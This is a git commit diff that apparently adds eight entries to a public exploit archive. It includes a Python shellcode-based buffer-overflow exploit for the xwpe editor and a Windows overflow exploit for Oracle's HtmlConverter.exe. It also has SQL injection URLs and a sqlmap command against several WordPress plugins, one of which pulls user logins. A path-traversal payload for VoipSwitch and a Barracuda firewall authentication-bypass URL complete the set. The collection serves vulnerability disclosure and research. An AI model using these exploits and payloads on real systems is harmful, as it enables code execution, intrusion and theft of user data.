DB: 2016-01-22
8 new exploits
This commit is contained in:
parent
6804f1aa58
commit
257c020493
9 changed files with 316 additions and 0 deletions
|
@ -35519,3 +35519,11 @@ id,file,description,date,author,platform,type,port
|
|||
39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
|
||||
39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
|
||||
39277,platforms/linux/local/39277.c,"Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0
|
||||
39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
|
||||
39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
|
||||
39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39281,platforms/php/webapps/39281.txt,"VoipSwitch 'action' Parameter Local File Include Vulnerability",2014-08-08,0x4148,php,webapps,0
|
||||
39282,platforms/php/webapps/39282.txt,"WordPress GB Gallery Slideshow Plugin 'wp-admin/admin-ajax.php' SQL Injection Vulnerability",2014-08-11,"Claudio Viviani",php,webapps,0
|
||||
39283,platforms/php/webapps/39283.txt,"WordPress FB Gorilla Plugin 'game_play.php' SQL Injection Vulnerability",2014-07-28,Amirh03in,php,webapps,0
|
||||
39284,platforms/windows/local/39284.txt,"Oracle HtmlConverter.exe - Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
|
||||
39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/hardware/remote/39278.txt
Executable file
9
platforms/hardware/remote/39278.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/69028/info
|
||||
|
||||
Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability.
|
||||
|
||||
An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.
|
||||
|
||||
Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest
|
95
platforms/linux/local/39285.py
Executable file
95
platforms/linux/local/39285.py
Executable file
|
@ -0,0 +1,95 @@
|
|||
# Exploit Author: Juan Sacco - http://www.exploitpack.com <
|
||||
jsacco@exploitpack.com>
|
||||
# Program: xwpe - Windows Editor v1.5.30a-2.1
|
||||
# Description: Programming environment and editor for console and X11
|
||||
# Tested and developed on: Kali Linux 2.0 x86 - https://www.kali.org
|
||||
#
|
||||
# Description: xwpe v1.5.30a-2.1 and prior is prone to a stack-based buffer
|
||||
# overflow vulnerability because the application fails to perform adequate
|
||||
# boundary-checks on user-supplied input.
|
||||
#
|
||||
# An attacker could exploit this issue to execute arbitrary code in the
|
||||
# context of the application. Failed exploit attempts will result in a
|
||||
# denial-of-service condition.
|
||||
#
|
||||
# Vendor homepage: http://www.identicalsoftware.com/xwpe
|
||||
# Kali Linux 2.0 package: pool/main/x/xwpe/xwpe_1.5.30a-2.1_i386.deb
|
||||
# MD5: 793a89f7df892c7934be6c2353a6f0f9
|
||||
#
|
||||
#gdb$ run $(python -c 'print "\x90" * 290 + "DCBA"')
|
||||
#Starting program: /usr/bin/xwe $(python -c 'print "\x90" * 290 + "DCBA"')
|
||||
#sh: 1: /usr/sbin/gpm: not found
|
||||
#
|
||||
# ESI: 0x41414141 EDI: 0x41414141 EBP: 0x41414141 ESP: 0xBFFFF370 EIP:
|
||||
0x42434441
|
||||
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while
|
||||
running hook_stop:
|
||||
#Cannot access memory at address 0x42434441
|
||||
#0x42434441 in ?? ()
|
||||
#gdb$ backtrace
|
||||
#0 0x42434441 in ?? ()
|
||||
#1 0x4f4e2041 in ?? ()
|
||||
#2 0x61732054 in ?? ()
|
||||
#3 0x21646576 in ?? ()
|
||||
#4 0x206f440a in ?? ()
|
||||
#5 0x20756f79 in ?? ()
|
||||
#6 0x746e6177 in ?? ()
|
||||
#7 0x206f7420 in ?? ()
|
||||
#8 0x65766173 in ?? ()
|
||||
#9 0x6c694620 in ?? ()
|
||||
#10 0x003f2065 in ?? ()
|
||||
#11 0x00000088 in ?? ()
|
||||
#12 0x00000132 in ?? ()
|
||||
#13 0x00000006 in ?? ()
|
||||
#14 0x00002710 in ?? ()
|
||||
#15 0x0000009a in ?? ()
|
||||
#16 0xfac9bc00 in ?? ()
|
||||
#17 0x00000098 in ?? ()
|
||||
#18 0x00000011 in ?? ()
|
||||
#19 0xb7f783d9 in _nc_wgetch () from /lib/i386-linux-gnu/libncurses.so.5
|
||||
#20 0xb7f79162 in wgetch () from /lib/i386-linux-gnu/libncurses.so.5
|
||||
#21 0x0809927d in ?? ()
|
||||
#22 0x0806b23c in ?? ()
|
||||
#23 0x08055c78 in ?? ()
|
||||
#24 0x080565b5 in ?? ()iles ESC-F3 Close W. F4 Search ^L S.Again ESC-X
|
||||
Quit
|
||||
|
||||
#25 0x080574aa in ?? ()
|
||||
#26 0x0804b8b8 in ?? ()
|
||||
#27 0xb7ddca63 in __libc_start_main (main=0x804b570, argc=0x2,
|
||||
argv=0xbffff664, init=0x809a060, fini=0x809a050, rtld_fini=0xb7fedc90
|
||||
<_dl_fini>, stack_end=0xbffff65c) at libc-start.c:287
|
||||
#28 0x08049ea1 in ?? ()
|
||||
|
||||
import os,subprocess
|
||||
def run():
|
||||
try:
|
||||
print "# xwpe Buffer Overflow by Juan Sacco"
|
||||
print "# It's AGAIN Fuzzing time on unusable exploits"
|
||||
print "# This exploit is for educational purposes only"
|
||||
# JUNK + SHELLCODE + NOPS + EIP
|
||||
|
||||
junk = "\x41"*262
|
||||
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
|
||||
nops = "\x90"*124
|
||||
eip = "\x50\xd1\xff\xbf"
|
||||
subprocess.call(["xwpe",' ', junk + shellcode + nops + eip])
|
||||
|
||||
except OSError as e:
|
||||
if e.errno == os.errno.ENOENT:
|
||||
print "Sorry, xwpe not found!"
|
||||
else:
|
||||
print "Error executing exploit"
|
||||
raise
|
||||
|
||||
def howtousage():
|
||||
print "Snap! Something went wrong"
|
||||
sys.exit(-1)
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
print "Exploit xWPE Local Overflow Exploit"
|
||||
print "Author: Juan Sacco"
|
||||
except IndexError:
|
||||
howtousage()
|
||||
run()
|
9
platforms/php/webapps/39279.txt
Executable file
9
platforms/php/webapps/39279.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/69089/info
|
||||
|
||||
The WordPress Spreadsheet plugin (wpSS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
wpSS 0.62 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
9
platforms/php/webapps/39280.txt
Executable file
9
platforms/php/webapps/39280.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/69105/info
|
||||
|
||||
The WordPress HDW Player plugin (Video Player & Video Gallery) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
HDW Player 2.4.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12
|
7
platforms/php/webapps/39281.txt
Executable file
7
platforms/php/webapps/39281.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/69109/info
|
||||
|
||||
VoipSwitch is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
|
||||
|
||||
https://www.example.com/user.php?action=../../../windows/win.ini%00.jpg
|
38
platforms/php/webapps/39282.txt
Executable file
38
platforms/php/webapps/39282.txt
Executable file
|
@ -0,0 +1,38 @@
|
|||
source: http://www.securityfocus.com/bid/69181/info
|
||||
|
||||
The GB Gallery Slideshow plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
GB Gallery Slideshow 1.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
|
||||
Accept-language: en-us,en;q=0.5
|
||||
Accept-encoding: gzip,deflate
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
User-agent: sqlmap/1.0-dev-5b2ded0 (http://sqlmap.org)
|
||||
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
|
||||
Host: 10.0.0.67
|
||||
Cookie: wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C5ae003a01e51c11e530c14f6149c9d07; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C6988bc86de7b7790fca51ea294e171a1; redux_current_tab=3
|
||||
Pragma: no-cache
|
||||
Cache-control: no-cache,no-store
|
||||
Content-type: application/x-www-form-urlencoded; charset=utf-8
|
||||
Content-length: 120
|
||||
Connection: close
|
||||
|
||||
action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=[SQL_Injection]
|
||||
|
||||
|
||||
Exploit via sqlmap:
|
||||
|
||||
sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://www.example.com/wp-admin/admin-ajax.php" \
|
||||
--data="action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2" -p selected_group --dbms=mysql
|
||||
|
||||
---
|
||||
Place: POST
|
||||
Parameter: selected_group
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL > 5.0.11 AND time-based blind
|
||||
Payload: action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2 AND SLEEP(5)
|
||||
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
|
||||
---
|
7
platforms/php/webapps/39283.txt
Executable file
7
platforms/php/webapps/39283.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/69222/info
|
||||
|
||||
FB Gorilla plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--
|
134
platforms/windows/local/39284.txt
Executable file
134
platforms/windows/local/39284.txt
Executable file
|
@ -0,0 +1,134 @@
|
|||
[+] Credits: hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source:
|
||||
http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt
|
||||
|
||||
|
||||
Vendor:
|
||||
===============
|
||||
www.oracle.com
|
||||
|
||||
|
||||
Product:
|
||||
========================================
|
||||
Java Platform SE 6 U24 HtmlConverter.exe
|
||||
Product Version: 6.0.240.50
|
||||
|
||||
|
||||
The HTML Converter is part of Java SE binary part of the JDK and Allows web
|
||||
page authors to explicitly target
|
||||
the browsers and platforms used in their environment when modifying their
|
||||
pages.
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
============================
|
||||
Buffer Overflow
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
When calling htmlConverter.exe with specially crafted payload it will cause
|
||||
buffer overflow executing arbitrary attacker supplied code.
|
||||
This was a small vulnerability included as part of the overall Oracle CPU
|
||||
released on January 19, 2016.
|
||||
|
||||
Reference:
|
||||
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
|
||||
|
||||
|
||||
|
||||
registers ...
|
||||
|
||||
EAX FFFFFFFE
|
||||
ECX FFFFFFFE
|
||||
EDX 0008E3C8
|
||||
EBX 7EFDE000
|
||||
ESP 0018FEB4
|
||||
EBP 0018FF88
|
||||
ESI 00001DB1
|
||||
EDI 00000000
|
||||
EIP 52525252 <-------- "RRRR" \x52
|
||||
C 0 ES 002B 32bit 0(FFFFFFFF)
|
||||
P 0 CS 0023 32bit 0(FFFFFFFF)
|
||||
A 1 SS 002B 32bit 0(FFFFFFFF)
|
||||
Z 0 DS 002B 32bit 0(FFFFFFFF)
|
||||
S 0 FS 0053 32bit 7EFDD000(FFF)
|
||||
T 0 GS 002B 32bit 0(FFFFFFFF)
|
||||
D 0
|
||||
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "
|
||||
#EIP @ 2493
|
||||
pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe "
|
||||
#EIP 2469 - 2479
|
||||
|
||||
#shellcode to pop calc.exe Windows 7 SP1
|
||||
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
|
||||
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
|
||||
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
|
||||
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
|
||||
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
|
||||
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
|
||||
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
|
||||
|
||||
|
||||
#JMP ESP kernel32.dll
|
||||
rp=struct.pack('<L', 0x76E72E2B)
|
||||
|
||||
|
||||
payload="A"*2469+rp+"\x90"*10+sc
|
||||
subprocess.Popen([pgm, payload], shell=False)
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=====================================
|
||||
Vendor Notification: August 28, 2015
|
||||
January 20, 2016 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
|
||||
Description:
|
||||
=============================================================
|
||||
|
||||
Vulnerable Product: [+] Java SE 6 U24 HtmlConverter.exe
|
||||
|
||||
=============================================================
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and that due
|
||||
credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit is given to
|
||||
the author.
|
||||
The author is not responsible for any misuse of the information contained
|
||||
herein and prohibits any malicious use of all security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
by hyp3rlinx
|
Loading…
Add table
Reference in a new issue